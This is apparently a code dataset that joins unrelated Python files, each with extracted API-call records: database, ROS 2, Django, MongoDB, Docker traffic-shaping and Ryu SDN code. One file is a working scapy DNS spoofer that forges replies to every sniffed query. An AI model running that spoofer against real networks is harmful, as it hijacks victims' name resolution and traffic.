"(self, 'source_interaction_type')\n", (20233, 20266), False, 'import pulumi\n'), ((20464, 20503), 'pulumi.get', 'pulumi.get', (['self', '"""target_profile_type"""'], {}), "(self, 'target_profile_type')\n", (20474, 20503), False, 'import pulumi\n'), ((20663, 20692), 'pulumi.get', 'pulumi.get', (['self', '"""tenant_id"""'], {}), "(self, 'tenant_id')\n", (20673, 20692), False, 'import pulumi\n'), ((20831, 20855), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (20841, 20855), False, 'import pulumi\n'), ((3250, 3298), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 
'description'], {}), "(__self__, 'description', description)\n", (3260, 3298), False, 'import pulumi\n'), ((3348, 3398), 'pulumi.set', 'pulumi.set', (['__self__', '"""display_name"""', 'display_name'], {}), "(__self__, 'display_name', display_name)\n", (3358, 3398), False, 'import pulumi\n'), ((3445, 3489), 'pulumi.set', 'pulumi.set', (['__self__', '"""link_name"""', 'link_name'], {}), "(__self__, 'link_name', link_name)\n", (3455, 3489), False, 'import pulumi\n'), ((3535, 3577), 'pulumi.set', 'pulumi.set', (['__self__', '"""mappings"""', 'mappings'], {}), "(__self__, 'mappings', mappings)\n", (3545, 3577), False, 'import pulumi\n'), ((3629, 3683), 'pulumi.set', 'pulumi.set', (['__self__', '"""operation_type"""', 'operation_type'], {}), "(__self__, 'operation_type', operation_type)\n", (3639, 3683), False, 'import pulumi\n'), ((3735, 3789), 'pulumi.set', 'pulumi.set', (['__self__', '"""reference_only"""', 'reference_only'], {}), "(__self__, 'reference_only', reference_only)\n", (3745, 3789), False, 'import pulumi\n'), ((13405, 13429), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {}), '()\n', (13427, 13429), False, 'import pulumi\n'), ((16811, 16840), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {'id': 'id'}), '(id=id)\n', (16833, 16840), False, 'import pulumi\n'), ((15655, 15722), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights/v20170101:Link"""'}), "(type_='azure-nextgen:customerinsights/v20170101:Link')\n", (15667, 15722), False, 'import pulumi\n'), ((15724, 15780), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-native:customerinsights:Link"""'}), "(type_='azure-native:customerinsights:Link')\n", (15736, 15780), False, 'import pulumi\n'), ((15782, 15839), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights:Link"""'}), "(type_='azure-nextgen:customerinsights:Link')\n", (15794, 15839), False, 'import pulumi\n'), ((15841, 15907), 'pulumi.Alias', 'pulumi.Alias', ([], 
{'type_': '"""azure-native:customerinsights/v20170426:Link"""'}), "(type_='azure-native:customerinsights/v20170426:Link')\n", (15853, 15907), False, 'import pulumi\n'), ((15909, 15976), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights/v20170426:Link"""'}), "(type_='azure-nextgen:customerinsights/v20170426:Link')\n", (15921, 15976), False, 'import pulumi\n')] |
"""
Database connection and sessions
"""
from sqlalchemy.engine.url import URL
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.interfaces import PoolListener
from igcweight import settings
__engine_url = {'drivername': settings.DB_ENGINE, 'query': settings.DB_ARGS}
# Only add the optional connection fields that are actually configured
# (empty string in settings means "not set").
__engine_url.update({key: value for key, value in (
    ('username', settings.DB_USERNAME),
    ('password', settings.DB_PASSWORD),
    ('host', settings.DB_HOST),
    ('port', settings.DB_PORT),
    ('database', settings.DB_DATABASE)) if value != ''})
class ForeignKeysListener(PoolListener):
    """Pool listener that turns on foreign-key enforcement.

    SQLite disables foreign-key checks per connection by default, so this
    runs ``pragma foreign_keys=ON`` on every new DB-API connection the
    pool hands out.
    """

    def connect(self, dbapi_con, con_record):
        # Invoked by SQLAlchemy once per freshly opened DB-API connection.
        dbapi_con.execute('pragma foreign_keys=ON')
# Module-level engine, Session factory, and a shared session instance.
engine = create_engine(
    URL(**__engine_url),
    echo=settings.DEBUG,  # log emitted SQL when debugging
    convert_unicode=True,  # NOTE(review): legacy flag, removed in SQLAlchemy 1.4
    listeners=[ForeignKeysListener()]  # enable SQLite FK enforcement per connection
)
Session = sessionmaker(bind=engine, autoflush=True)
session = Session()
| [
"sqlalchemy.orm.sessionmaker",
"sqlalchemy.engine.url.URL"
] | [((1000, 1041), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine', 'autoflush': '(True)'}), '(bind=engine, autoflush=True)\n', (1012, 1041), False, 'from sqlalchemy.orm import sessionmaker\n'), ((877, 896), 'sqlalchemy.engine.url.URL', 'URL', ([], {}), '(**__engine_url)\n', (880, 896), False, 'from sqlalchemy.engine.url import URL\n')] |
#!/usr/bin/env python3
import os
import sys
import copy
import re
import importlib
import numpy as np
import rclpy
from rclpy.qos import qos_profile_sensor_data
from rclpy.node import Node
from rclpy.exceptions import ParameterNotDeclaredException
from rcl_interfaces.msg import Parameter
from rcl_interfaces.msg import ParameterType
from rcl_interfaces.msg import ParameterDescriptor
import sensor_msgs.msg
from cv_bridge import CvBridge
from rclpy.qos import QoSProfile
import cv2
# Require OpenCV 4.x or newer. Compare the major version numerically:
# a plain string comparison would wrongly reject e.g. "10.0.0", since
# "10.0.0" < "4.0.0" lexicographically.
if int(cv2.__version__.split(".")[0]) < 4:
    raise ImportError("Requires opencv >= 4.0, "
                      "but found {:s}".format(cv2.__version__))
class RQTCameraGazebo(Node):
    """ROS 2 node that relays camera frames from one topic to another.

    Subscribes to a camera image topic (e.g. from Gazebo) and republishes
    each frame unchanged on a second topic, preserving the original
    message timestamp.
    """

    def __init__(self):
        super().__init__("rqt_camera_gazebo")
        # Descriptors for the node's configurable parameters.
        camera_image_subscription_topic_descriptor = ParameterDescriptor(
            type=ParameterType.PARAMETER_STRING,
            description='Camera image subscription topic.')
        camera_image_publish_topic_descriptor = ParameterDescriptor(
            type=ParameterType.PARAMETER_STRING,
            description='Camera image publish topic.')
        camera_image_format_descriptor = ParameterDescriptor(
            type=ParameterType.PARAMETER_STRING,
            description='Camera image format.')
        self.declare_parameter("camera_sub", "rgb_cam",
                               camera_image_subscription_topic_descriptor)
        self.declare_parameter("camera_pub", "rqt_rgb_cam",
                               camera_image_publish_topic_descriptor)
        # BUG FIX: "camera_format" was previously declared with the
        # publish-topic descriptor; use the format descriptor (which was
        # otherwise unused) instead.
        self.declare_parameter("camera_format", "bgr8",
                               camera_image_format_descriptor)
        self.cameraImageSubTopic = self.get_parameter("camera_sub").value
        self.cameraImagePubTopic = self.get_parameter("camera_pub").value
        self.cameraImageFormat = self.get_parameter("camera_format").value
        # Converts between ROS Image messages and OpenCV images.
        self.bridge = CvBridge()
        # Subscriber for incoming camera frames.
        self.imageSub = self.create_subscription(sensor_msgs.msg.Image,
                '/{:s}'.format(self.cameraImageSubTopic),
                self.imageCallback,
                qos_profile_sensor_data)
        # Publisher for the relayed frames.
        self.imagePub = self.create_publisher(sensor_msgs.msg.Image,
                '/{:s}'.format(self.cameraImagePubTopic), 0)

    def imageCallback(self, data):
        """Re-encode the incoming frame and republish it with its original stamp."""
        scene = self.bridge.imgmsg_to_cv2(data, self.cameraImageFormat)
        msg = self.bridge.cv2_to_imgmsg(scene, self.cameraImageFormat)
        # Keep the source timestamp so downstream consumers see the
        # original capture time, not the republish time.
        msg.header.stamp = data.header.stamp
        self.imagePub.publish(msg)
def main(args=None):
    """Initialise rclpy, spin the relay node until shutdown, then clean up."""
    rclpy.init(args=args)
    relay_node = RQTCameraGazebo()
    rclpy.spin(relay_node)
    rclpy.shutdown()


if __name__ == '__main__':
    main()
| [
"rcl_interfaces.msg.ParameterDescriptor",
"rclpy.spin",
"cv_bridge.CvBridge",
"rclpy.init",
"rclpy.shutdown"
] | [((2647, 2668), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (2657, 2668), False, 'import rclpy\n'), ((2702, 2718), 'rclpy.spin', 'rclpy.spin', (['node'], {}), '(node)\n', (2712, 2718), False, 'import rclpy\n'), ((2723, 2739), 'rclpy.shutdown', 'rclpy.shutdown', ([], {}), '()\n', (2737, 2739), False, 'import rclpy\n'), ((819, 928), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image subscription topic."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image subscription topic.')\n", (838, 928), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1006, 1110), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image publish topic."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image publish topic.')\n", (1025, 1110), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1173, 1270), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image format."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image format.')\n", (1192, 1270), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1918, 1928), 'cv_bridge.CvBridge', 'CvBridge', ([], {}), '()\n', (1926, 1928), False, 'from cv_bridge import CvBridge\n')] |
import binaryCode as bc
import pyperclip
import time

# Minimal interactive front-end for the binaryCode encode/decode helpers.
choice = input("encode, decode, or make a key[e/d/m]?\n")
if choice == "e":
    # Encode the given text with the supplied key; output goes to photo.jpeg.
    bc.encode(input("what text?\n"), input("what key?\n"))
    print("file saved as photo.jpeg.\nRename for extra security.")
elif choice == "d":
    # Decode the named file with the supplied key and show the result.
    print(bc.decode(input("what key?\n"), input("filename?\n")))
    print("that's the code.")
elif choice == "m":
    # Generate a fresh key and place it on the clipboard.
    pyperclip.copy(bc.generateKey(False))
    print("key copied to clipboard.")
else:
    print("??? i dont get it")
# Pause so console output stays visible before the window closes.
time.sleep(5)
"time.sleep",
"binaryCode.generateKey"
] | [((487, 500), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (497, 500), False, 'import time\n'), ((389, 410), 'binaryCode.generateKey', 'bc.generateKey', (['(False)'], {}), '(False)\n', (403, 410), True, 'import binaryCode as bc\n')] |
# -*- coding: utf-8 -*-
'''
Created on Mar 20, 2011
@author: <NAME>
@copyright: Copyright © 2011
other contributers:
'''
from django import forms
from django.utils.translation import ugettext, ugettext_lazy as _
from calendars.models.cals import Occurrence
class OccurrenceForm(forms.ModelForm):
    """Form for editing an Occurrence's start and end times."""
    start = forms.DateTimeField()
    end = forms.DateTimeField()

    class Meta:
        model = Occurrence
        exclude = ('original_start', 'original_end', 'event', 'cancelled')

    def clean_end(self):
        """Validate that the occurrence ends strictly after it starts."""
        # 'start' is absent from cleaned_data when its own validation
        # failed, so only cross-validate when both values are present
        # (the old code raised KeyError in that case).
        start = self.cleaned_data.get('start')
        end = self.cleaned_data['end']
        if start is not None and end <= start:
            raise forms.ValidationError(
                _("The end time must be later than start time."))
        return end
| [
"django.utils.translation.ugettext_lazy",
"django.forms.DateTimeField"
] | [((313, 334), 'django.forms.DateTimeField', 'forms.DateTimeField', ([], {}), '()\n', (332, 334), False, 'from django import forms\n'), ((345, 366), 'django.forms.DateTimeField', 'forms.DateTimeField', ([], {}), '()\n', (364, 366), False, 'from django import forms\n'), ((631, 679), 'django.utils.translation.ugettext_lazy', '_', (['"""The end time must be later than start time."""'], {}), "('The end time must be later than start time.')\n", (632, 679), True, 'from django.utils.translation import ugettext, ugettext_lazy as _\n')] |
#!/usr/bin/env python
import argparse
import logging
import pymongo
from logger import setup_logger
def database(connection_string, db_name):
    """Connect to mongodb."""
    # Open a client for the given server and return the named database handle.
    return pymongo.MongoClient(connection_string)[db_name]
def move_notes(db, collection, source_id, source, dest, dry_run):
    """Rename the 'source' field to 'dest' on every case in 'collection'
    in database 'db' whose caseReference.sourceId equals 'source_id'.

    When 'dry_run' is set, nothing is modified; the cases that would be
    changed are logged instead."""
    logging.info(f"Moving values from {source} to {dest} in collection: {collection}")
    query = {"caseReference.sourceId": source_id}
    if dry_run:
        logging.info("Dry running notes movement")
        matching_cases = db[collection].find(query)
        logging.info(f"Would move {source} to {dest} on:")
        for case in matching_cases:
            logging.info(f"Case: {case}")
        return
    rename_op = pymongo.UpdateMany(query, {"$rename": {source: dest}})
    outcome = db[collection].bulk_write([rename_op])
    logging.info(f"Outcome: {outcome.bulk_api_result}")
def main():
    """Parse command-line options and run the notes migration."""
    parser = argparse.ArgumentParser(
        description='Move case notes between the regular and restricted notes fields.')
    parser.add_argument('--connection_string', type=str, required=True, help='mongodb connection string')
    parser.add_argument('--source_id', type=str, required=True, help='Source identifier for cases to update')
    parser.add_argument('--database_name', type=str, default='covid19', help='Name of the database with cases to update')
    parser.add_argument('--collection_name', type=str, default='cases', help='Collection with cases to update')
    parser.add_argument('--derestrict', action="store_true", help='Move restricted notes to notes (default is move notes to restricted notes)')
    parser.add_argument('--dry_run', action="store_true", help="Don't actually make any changes, just report on what would have changed")
    args = parser.parse_args()
    db = database(args.connection_string, args.database_name)
    # Default direction is notes -> restrictedNotes; --derestrict reverses it.
    if args.derestrict:
        source, destination = "restrictedNotes", "notes"
    else:
        source, destination = "notes", "restrictedNotes"
    move_notes(db, args.collection_name, args.source_id, source, destination, args.dry_run)
if __name__ == '__main__':
    # Configure logging before the migration emits any output.
    setup_logger()
    main()
| [
"argparse.ArgumentParser",
"logger.setup_logger",
"pymongo.UpdateMany",
"pymongo.MongoClient",
"logging.info"
] | [((189, 227), 'pymongo.MongoClient', 'pymongo.MongoClient', (['connection_string'], {}), '(connection_string)\n', (208, 227), False, 'import pymongo\n'), ((618, 705), 'logging.info', 'logging.info', (['f"""Moving values from {source} to {dest} in collection: {collection}"""'], {}), "(\n f'Moving values from {source} to {dest} in collection: {collection}')\n", (630, 705), False, 'import logging\n'), ((1154, 1205), 'logging.info', 'logging.info', (['f"""Outcome: {outcome.bulk_api_result}"""'], {}), "(f'Outcome: {outcome.bulk_api_result}')\n", (1166, 1205), False, 'import logging\n'), ((1233, 1341), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Move case notes between the regular and restricted notes fields."""'}), "(description=\n 'Move case notes between the regular and restricted notes fields.')\n", (1256, 1341), False, 'import argparse\n'), ((2410, 2424), 'logger.setup_logger', 'setup_logger', ([], {}), '()\n', (2422, 2424), False, 'from logger import setup_logger\n'), ((777, 819), 'logging.info', 'logging.info', (['"""Dry running notes movement"""'], {}), "('Dry running notes movement')\n", (789, 819), False, 'import logging\n'), ((871, 921), 'logging.info', 'logging.info', (['f"""Would move {source} to {dest} on:"""'], {}), "(f'Would move {source} to {dest} on:')\n", (883, 921), False, 'import logging\n'), ((1033, 1087), 'pymongo.UpdateMany', 'pymongo.UpdateMany', (['query', "{'$rename': {source: dest}}"], {}), "(query, {'$rename': {source: dest}})\n", (1051, 1087), False, 'import pymongo\n'), ((961, 990), 'logging.info', 'logging.info', (['f"""Case: {case}"""'], {}), "(f'Case: {case}')\n", (973, 990), False, 'import logging\n')] |
import contextlib
import logging
import socket
import sys
import docker
import yaml
import ip_utils
# Module-wide Docker client and logger. Default verbosity is INFO;
# the '-v' command-line flag (handled in __main__ below) raises it to DEBUG.
client = docker.from_env()
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('netz')
def compose_name():
    """Return the Compose project this container belongs to (HACK?).

    Inside a container the hostname is a prefix of the container ID, so
    find ourselves in the Docker API by matching on that prefix.
    """
    hostname = socket.gethostname()
    candidates = [c for c in client.containers.list()
                  if c.id.startswith(hostname)]
    if not candidates:
        raise RuntimeError(
            'Netz container could not find itself on the Docker API.')
    return candidates[0].labels.get('com.docker.compose.project')
def project_containers(project):
    """ Get all containers that belong to a Compose project. """
    label = 'com.docker.compose.project'
    matching = [c for c in client.containers.list()
                if c.labels.get(label, None) == project]
    return tuple(matching)
def project_networks(project):
    """ Get all networks that belong to a Compose project. """
    label = 'com.docker.compose.project'
    matching = [n for n in client.networks.list()
                if n.attrs['Labels'].get(label, None) == project]
    return tuple(matching)
def interface_in_net(c, n):
    """ Get interface at which container c is attached to network n. """
    # The container's IPv4 address within this network.
    addr = n.attrs['Containers'][c.id]['IPv4Address']
    # Ask the container for its interfaces and map each IP to its name.
    table = ip_utils.ipv4_to_name(raising_exec(c, 'ip address').decode())
    return table[addr]
def raising_exec(c, cmd):
    """ Run command cmd on container c; raise on return code != 0. """
    # The high-level exec API does not expose the exit code reliably
    # (docker-py issue #1381), so use the low-level API directly,
    # following the approach of docker-py PR #1495.
    log.debug('Running command {}'.format(cmd))
    api = c.client.api
    handle = api.exec_create(c.id, cmd, stdout=True, stderr=True,
                             stdin=False, tty=False, privileged=False,
                             user='')
    output = api.exec_start(handle['Id'], detach=False, tty=False,
                            stream=False, socket=False)
    if api.exec_inspect(handle['Id'])['ExitCode'] != 0:
        raise RuntimeError(output)
    return output
def tc_commands(dev, config):
    """Yield the shell commands that apply traffic shaping to device *dev*.

    config is a mapping that may contain 'htb' (bandwidth class options)
    and/or 'netem' (network-emulation options such as delay or loss).
    An empty config yields only the queue-length setup command.
    """
    htb = config.get('htb', '')
    netem = config.get('netem', '')
    # https://github.com/moby/moby/issues/33162#issuecomment-306424194
    yield 'ip link set {} qlen 1000'.format(dev)
    if htb:
        # Create an htb that assigns class 11 by default.
        yield 'tc qdisc replace dev {} root handle 1: htb default 1'.format(
            dev)
        # We add no filters, so no other classes than 1 will be used.
        # Apply the config to the default class. We need to add a classid,
        # so children can reference it.
        yield 'tc class add dev {} parent 1: classid 1:1 htb {}'.format(
            dev, htb)
        # At this point, class 1:1 has the default pfifo_fast.
        # Now we add netem to that.
        if netem:
            yield 'tc qdisc add dev {} parent 1:1 handle 10: netem {}'.format(
                dev, netem)
    elif netem:
        # Fix: previously a config with neither 'htb' nor 'netem' still
        # emitted a bare 'netem ' qdisc here; only install netem when it
        # is actually configured.
        yield 'tc qdisc replace dev {} root netem {}'.format(dev, netem)
if __name__ == '__main__':
    # Entry point: read netz.yml and apply each link configuration with tc.
    # '-v' anywhere on the command line enables debug logging.
    if '-v' in sys.argv:
        log.info('Verbose mode.')
        log.setLevel(level=logging.DEBUG)
    with open('netz.yml') as f:
        config = yaml.safe_load(f.read())
    name = compose_name()
    log.info('Using project name "{}".'.format(name))
    # name->instance for all networks in the Compose project.
    nets = {n.attrs['Labels']['com.docker.compose.network']: n for n in
            project_networks(name)}
    # Ditto for containers.
    cons = {c.labels['com.docker.compose.service']: c for c in
            project_containers(name)}
    # Iterate top level (network names).
    for net_name, net_cfg in config.items():
        log.debug('In network {}'.format(net_name))
        # Get network instance by name.
        try:
            net = nets[net_name]
        except KeyError as e:
            # A config entry for a network that Compose did not create.
            log.error('Network "{}" not found.'.format(net_name))
            exit(1)
        # Iterate second level (container name -> link config)
        for con_name, link_cfg in net_cfg.items():
            # Get container instance by name.
            try:
                con = cons[con_name]
            except KeyError as e:
                # A config entry for a service that is not running.
                log.error('Container "{}" not found.'.format(con_name))
                exit(1)
            # Get device for container in network
            dev = interface_in_net(con, net)
            log.debug('Applying to {}: {}'.format(con_name, link_cfg))
            try:
                # Run each generated tc/ip command inside the container;
                # raising_exec raises RuntimeError on a non-zero exit code.
                for cmd in tc_commands(dev, link_cfg):
                    raising_exec(con, cmd)
            except RuntimeError as e:
                log.error(('Error applying "{}" to container "{}" in network '
                           '"{}": {}').format(cmd, con_name, net_name, e))
                exit(1)
| [
"logging.basicConfig",
"docker.from_env",
"socket.gethostname",
"logging.getLogger"
] | [((112, 129), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (127, 129), False, 'import docker\n'), ((131, 170), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (150, 170), False, 'import logging\n'), ((177, 202), 'logging.getLogger', 'logging.getLogger', (['"""netz"""'], {}), "('netz')\n", (194, 202), False, 'import logging\n'), ((310, 330), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (328, 330), False, 'import socket\n')] |
#Program to fetch the http status code give the url/api
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
import emoji
#Taking input url from user
requestURL = input("Enter the URL to be invoked: ")
#Gets the response from URL and prints the status code and message accordingly
try:
response = urlopen(requestURL)
#In case of success, prints success status code
print('Status code : ' + str(response.code))
print('Message : ' + 'Request succeeded. Request returned message - ' + response.reason)
except HTTPError as e:
#In case of request failure, prints HTTP error status code
print('Status : ' + str(e.code))
print('Message : Request failed. Request returned reason - ' + e.reason)
except URLError as e:
#In case of bad URL or connection failure, prints Win Error
print('Status :', str(e.reason).split(']')[0].replace('[',''))
print('Message : '+ str(e.reason).split(']')[1])
| [
"urllib.request.urlopen"
] | [((330, 349), 'urllib.request.urlopen', 'urlopen', (['requestURL'], {}), '(requestURL)\n', (337, 349), False, 'from urllib.request import urlopen\n')] |
import re
import torch
from torchvision import transforms
import users.neural_transfer.utils as utils
from users.neural_transfer.transformer_net import TransformerNet
from users.neural_transfer.vgg import Vgg16
def stylize(image):
device = torch.device('cpu')
content_image = utils.load_image(image)
content_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Lambda(lambda x: x.mul(255))
])
content_image = content_transform(content_image)
content_image = content_image.unsqueeze(0).to(device)
with torch.no_grad():
style_model = TransformerNet()
# 更改此处模型文件可以更改不同风格
state_dict = torch.load('users/config/mosaic.pth')
# remove saved deprecated running_* keys in InstanceNorm from the checkpoint
for k in list(state_dict.keys()):
if re.search(r'in\d+\.running_(mean|var)$', k):
del state_dict[k]
style_model.load_state_dict(state_dict)
style_model.to(device)
output = style_model(content_image).cpu()
output_path = image.split('.')[0] + '_transfer.jpg'
utils.save_image(output_path, output[0])
| [
"re.search",
"torch.load",
"users.neural_transfer.transformer_net.TransformerNet",
"users.neural_transfer.utils.save_image",
"users.neural_transfer.utils.load_image",
"torch.no_grad",
"torchvision.transforms.ToTensor",
"torch.device"
] | [((245, 264), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (257, 264), False, 'import torch\n'), ((283, 306), 'users.neural_transfer.utils.load_image', 'utils.load_image', (['image'], {}), '(image)\n', (299, 306), True, 'import users.neural_transfer.utils as utils\n'), ((1010, 1050), 'users.neural_transfer.utils.save_image', 'utils.save_image', (['output_path', 'output[0]'], {}), '(output_path, output[0])\n', (1026, 1050), True, 'import users.neural_transfer.utils as utils\n'), ((532, 547), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (545, 547), False, 'import torch\n'), ((565, 581), 'users.neural_transfer.transformer_net.TransformerNet', 'TransformerNet', ([], {}), '()\n', (579, 581), False, 'from users.neural_transfer.transformer_net import TransformerNet\n'), ((618, 655), 'torch.load', 'torch.load', (['"""users/config/mosaic.pth"""'], {}), "('users/config/mosaic.pth')\n", (628, 655), False, 'import torch\n'), ((351, 372), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (370, 372), False, 'from torchvision import transforms\n'), ((777, 821), 're.search', 're.search', (['"""in\\\\d+\\\\.running_(mean|var)$"""', 'k'], {}), "('in\\\\d+\\\\.running_(mean|var)$', k)\n", (786, 821), False, 'import re\n')] |
from scapy.all import *
from scapy.layers.dns import DNSQR, DNS, DNSRR
from scapy.layers.inet import IP, UDP
def dnsSpoof(packet):
spoofDNS = '192.168.0.7'
dstip = packet[IP].src
srcip = packet[IP].dst
sport = packet[UDP].sport
dport = packet[UDP].dport
if packet.haslayer(DNSQR):
dnsid = packet[DNS].id
qd = packet[DNS].qd
dnsrr = DNSRR(rrname=qd.qname, ttl=10, rdata=spoofDNS)
spoofPacket = IP(dst=dstip, src=srcip) / UDP(dport=sport, sport=dport) /\
DNS(id=dnsid, qd=qd, aa=1, qr=1, an=dnsrr)
send(spoofPacket)
print('+++ SOURCE[{}] -> DEST[{}]'.format(dstip, srcip))
print(spoofPacket.summary())
def main():
print('+++ DNS SPOOF START...')
sniff(filter='udp port 53', store=0, prn=dnsSpoof)
if __name__ == "__main__":
main() | [
"scapy.layers.dns.DNS",
"scapy.layers.dns.DNSRR",
"scapy.layers.inet.UDP",
"scapy.layers.inet.IP"
] | [((383, 429), 'scapy.layers.dns.DNSRR', 'DNSRR', ([], {'rrname': 'qd.qname', 'ttl': '(10)', 'rdata': 'spoofDNS'}), '(rrname=qd.qname, ttl=10, rdata=spoofDNS)\n', (388, 429), False, 'from scapy.layers.dns import DNSQR, DNS, DNSRR\n'), ((534, 576), 'scapy.layers.dns.DNS', 'DNS', ([], {'id': 'dnsid', 'qd': 'qd', 'aa': '(1)', 'qr': '(1)', 'an': 'dnsrr'}), '(id=dnsid, qd=qd, aa=1, qr=1, an=dnsrr)\n', (537, 576), False, 'from scapy.layers.dns import DNSQR, DNS, DNSRR\n'), ((452, 476), 'scapy.layers.inet.IP', 'IP', ([], {'dst': 'dstip', 'src': 'srcip'}), '(dst=dstip, src=srcip)\n', (454, 476), False, 'from scapy.layers.inet import IP, UDP\n'), ((479, 508), 'scapy.layers.inet.UDP', 'UDP', ([], {'dport': 'sport', 'sport': 'dport'}), '(dport=sport, sport=dport)\n', (482, 508), False, 'from scapy.layers.inet import IP, UDP\n')] |
import sqlite3
import json
import logging
from ryu.app.wsgi import ControllerBase, WSGIApplication, route
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, CONFIG_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import udp
from webob import Response
from asymlist import Node, AsymLList
conn = sqlite3.connect('nfv.sqlite')
cur = conn.cursor()
flows = {}
DELTA = 3000
##################
class vnf(Node):
def __init__(self, vnf_id, is_bidirect=True, cur=None):
super().__init__(vnf_id, is_bidirect)
### added iftype bitwise support: 1(01)-out, 2(10)-in, 3(11)-inout
### & 1 - first bit; & 2 - second bit
### Ex. bitwise iftype selection:
### 'select * from vnf where iftype & 2 != 0'
### 'select dpid, in_port, locator_addr from vnf where id=X and iftype & 1 != 0'
cur.execute(''' select dpid, in_port, locator_addr, bidirectional from vnf where id=? and iftype & 2 != 0''', (self.id,))
self.dpid_in, self.port_in, self.locator_addr_in, is_bidirect = cur.fetchone()
logging.debug('Locator addr: %s', self.locator_addr_in)
cur.execute(''' select dpid, in_port, locator_addr from vnf where id=? and iftype & 1 != 0''', (self.id,))
self.dpid_out, self.port_out, self.locator_addr_out = cur.fetchone()
if is_bidirect.lower() == "false":
self.is_bidirect = False
class sfc(AsymLList):
def __init__(self, flow_id, nodeClass=vnf, cur=None):
self.cur = cur
self.cur.execute('''select * from flows where id = ? ''', (flow_id,))
self.flow_spec = cur.fetchone()
if self.flow_spec is None:
logging.debug('Flow %s is not defined', flow_id)
raise ValueError("Flow is not known")
self.flow_dict = {}
self.flows = {}
(self.flow_id, self.name, self.flow_dict['in_port'],
self.flow_dict['eth_dst'], self.flow_dict['eth_src'], self.flow_dict['eth_type'],
self.flow_dict['ip_proto'], self.flow_dict['ipv4_src'], self.flow_dict['ipv4_dst'],
self.flow_dict['tcp_src'], self.flow_dict['tcp_dst'], self.flow_dict['udp_src'],
self.flow_dict['udp_dst'], self.flow_dict['ipv6_src'], self.flow_dict['ipv6_dst'],
self.service_id) = self.flow_spec
if not self.flow_dict['eth_type']:
self.flow_dict['eth_type'] = 0x0800
self.flow_id = int(flow_id)
self.reverse_flow_id = self.flow_id+DELTA
self.flows[self.flow_id] = self.flow_dict
self.flows[self.reverse_flow_id] = sfc_app_cls.reverse_flow(self.flows[self.flow_id])
self.cur.execute('''select vnf_id from service where service_id = ? except select next_vnf_id from service where service_id = ? ''', (self.service_id, self.service_id))
vnf_id = self.cur.fetchone()[0]
super().__init__(vnf_id, is_bidirect=True, nodeClass=nodeClass, cur=self.cur)
self.fill()
def __str__(self):
return str(self.forward())
def append(self):
self.cur.execute('''select next_vnf_id from service where service_id = ? and vnf_id = ? ''', (self.service_id, self.last.id))
next_vnf_id = self.cur.fetchone()[0]
if next_vnf_id is None:
return None
logging.debug('Trying to append %s', next_vnf_id)
return super().append(next_vnf_id, cur=self.cur)
def fill(self):
logging.debug('Filling...')
while self.append():
pass
return self.last
def install_catching_rule(self, sfc_app_cls):
logging.debug("Adding catching rule...")
actions = []
flow_id = self.flow_id
for flow_id in (self.flow_id, self.reverse_flow_id):
for dp in sfc_app_cls.datapaths.values():
match = sfc_app_cls.create_match(dp.ofproto_parser, self.flows[flow_id])
sfc_app_cls.add_flow(dp, 1, match, actions, metadata=flow_id, goto_id=2)
if self.back is None:
break
return Response(status=200)
def delete_rule(self, sfc_app_cls, flow_match):
logging.debug('Deleting rule...')
flow_dict = self.flows[flow_match]
for dp in sfc_app_cls.datapaths.values():
match_del = sfc_app_cls.create_match(dp.ofproto_parser, flow_dict)
sfc_app_cls.del_flow(datapath=dp, match=match_del)
def install_steering_rule(self, sfc_app_cls, dp_entry, in_port_entry, flow_match):
logging.debug("Adding steering rule...")
actions = []
dp = dp_entry
parser = dp.ofproto_parser
flow_dict = self.flows[flow_match]
flow_dict['in_port'] = in_port_entry
match = sfc_app_cls.create_match(parser, flow_dict)
if flow_match < DELTA:
for vnf in self.forward():
#dpid_out = vnf.dpid_out
actions.append(parser.OFPActionSetField(eth_dst=vnf.locator_addr_in))
sfc_app_cls.add_flow(dp, 8, match, actions, goto_id=1)
actions = []
flow_dict['in_port'] = vnf.port_out
dp = sfc_app_cls.datapaths[vnf.dpid_out]
match = sfc_app_cls.create_match(parser, flow_dict)
else:
